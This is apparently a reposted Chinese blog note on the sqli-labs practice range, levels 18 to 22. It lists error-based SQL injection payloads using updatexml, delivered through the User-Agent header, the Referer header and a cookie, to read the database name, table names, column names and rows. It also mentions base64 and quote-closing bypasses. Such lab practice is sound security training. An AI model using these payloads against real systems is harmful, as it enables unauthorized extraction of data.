【靶场】
作者:互联网
less-18
user-agent注入
' and updatexml(1,concat('~',(select database()),'~'),1),1,1,) -- lq
less-19
'or updatexml(1,concat(0x7e,(database())),1) and '1'='1
referer参数注入
less-20 cookie注入
' and updatexml(1,concat('~',(select table_name from information_schema.tables where table_schema='security' limit 0,1),'~'),1) -- lq 判断表名
' and updatexml(1,concat('~',(select column_name from information_schema.columns where table_schema='security' and table_name='emails' limit 0,1),'~'),1) -- lq 判断字段名
' and updatexml(1,concat('~',(select id from security.emails limit 0,1),'~'),1) -- lq 表中数据
less-21 based64编码(注释符绕过)
将sql语句采用based64编码加密注入
报错了。提示单引号有错,采用过滤符绕过
less-22与前一题一样采用闭合方式为双引号闭合
标签:less,lq,concat,updatexml,table,靶场,select 来源: https://www.cnblogs.com/scjinjiang/p/16356801.html